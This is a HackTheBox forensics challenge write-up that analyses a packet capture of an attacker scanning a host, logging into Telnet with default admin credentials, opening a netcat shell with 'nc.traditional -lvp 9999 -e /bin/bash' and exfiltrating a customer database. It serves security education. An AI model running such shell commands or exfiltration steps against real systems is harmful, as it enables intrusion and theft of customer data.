HackTheBox: Forensics Challenge – MarketDump

Link: https://app.hackthebox.com/challenges/marketdump

This challenge provides us with a .zip that only contains a single MarketDump.pcapng file. The challenge description reads:

We have got informed that a hacker managed to get into our internal network after pivoting through the web platform that runs in public internet. He managed to bypass our small product stocks logging platform and then he got our costumer database file. We believe that only one of our costumers was targeted. Can you find out who the customer was?

Challenge Description

I opened up the .pcapng file in Wireshark, it has 2868 recorded packets. It appears the 10.0.2.15 IP appears to be the attacker in this case, and 10.0.2.3 must be the server that is running MySQL.

Packet Capture Overview:

  • The first 2000 or so packets just seem to be back and forth TCP calls with no real evidence of compromise. There was a server greeting from MySQL.
  • After the first 2000 packets, the activity changes and we can see packets for SSH, MySQL and HTTP light up.
  • By Packet 2104 a PSQL request for NT LANMAN appears.
  • Packet 2172 shows a TCP segment of random1random2random3random4
  • Followed closely by a malformed DNS packet on 2181 that contains krbtgt in the payload. It appears the attacker is attempting to send malformed packets to get a golden ticket or gain access to the machine.
  • Packet 2202 is a GET request for /nice ports,/Trinity.txt.bak
  • Packet 2242 is an OPTIONS request to port 53 of 10.0.2.3
  • Packet 2296 contains segment data of NSPlayer 9.0.0.2 which is a typical User-Agent for the Windows Media Player Browser
  • Packet 2305 contains (CONNECT_DATA=(COMMAND=version))
  • Packet 2314 contains MSSQLServer
  • Packet 2357 shows an nmap scripting engine GET request to /nmaplowercheck1531136698
  • Packet 2363 is a malformed packet containing POST /sdk with a <soap:Envelope>... </soap:Envelope> body
  • Packet 2366 is another POST /sdk with a similar body
  • Packets 2368 & 2370 are an initial Telnet connection that seems to go nowhere.
  • Packet 2372, 2375, 2380 are a 400 Bad Requests
  • Packet 2401, 10.0.2.15 reaches out to 10.0.2.3 with a GET /HNAP1 with a Nmap Scripting Engine User-Agent
  • Followed by several more Bad requests at 2404, 2408, 2410
  • Packet 2413 returns a 404 Not found on 10.0.2.3 for /sdk
  • Packet 2415 returns a 404 Not found on 10.0.2.3 for /nmaplowercheck1531136698
  • Packet 2419 is a 200 OK which returns a HTML oage with #DataNET in the title
  • Packet 2434 GET /evox/about from 10.0.2.15 to 10.0.2.3 (Bad Request)
  • Packet 2452 checks /HNAP again (a vulnerability that can allow RCE), but it returns 404
    • These last few packets appear to be NMAP doing a scan to check for vulnerabilities
  • Packet 2482, 2484: 10.0.2.15 tries to log in to telnet on 10.0.2.3 but fails
  • Packet 2459-2514 are ICMP ping packets
  • Packet 2518 a HTTP request coming from User-Agent curl/7.60.0
  • Packet 2526, DNS request for A acid which returns 192.168.0.24
  • Packets 2531 – 2539, user tries to login to Telnet as admin:admin and fails
  • Packet 2545, another DNS request for A acid whcih returns 192.168.0.24
  • Packets 2555-2559, user tries to login to Telnet as admin:admin and SUCCEEDS.
  • Packet 2563-2579: Telnet command ran to view stock/inventory
  • Packet 2578, user logs back into telnet and immediately runs the stock command again
Welcome, admin

Here is you're daily stock report!


PRODUCT PRICE   STOCK
SHIRTS  20$   50
JEANS  40$   99
WALLETS 15$   19
SOCKS  10$   100
Type exit to exit the program: 
  • Packet 2631, Telnet command ran nc.traditional -lvp 9999 -e /bin/bash
  • Packet 2633, reverse shell started and activity begins contact 10.0.2.3:9999
    • This is tcp.stream eq 1056

From here, I followed the TCP stream and the attacker:

  • Ran ls -la to find two files: costumers.sql and login.sh
  • Ran pwd to find they were in /var/www/html/MarketDump
  • Ran whoami to find they were root (Oh man)
  • Ran wc -l costumers.ql for the wordcount of 10302
  • Copied the sql file to /tmp and exfiltrated it via a Python web server on port 9998
  • Ran cat costumers.sql to get an output of Credit Card Numbers
    • One of the customers has a card number that contains letters instead of just numbers, this is our compromised customer
  • The user then removed the costumers.sql file from /tmp and ran exit

Through trial and error, I found the unusual string from the database was base58 encoded. Decoding it from an online web tool nets us the flag.

Comments

No comments available.

Leave a Reply

Your email address will not be published.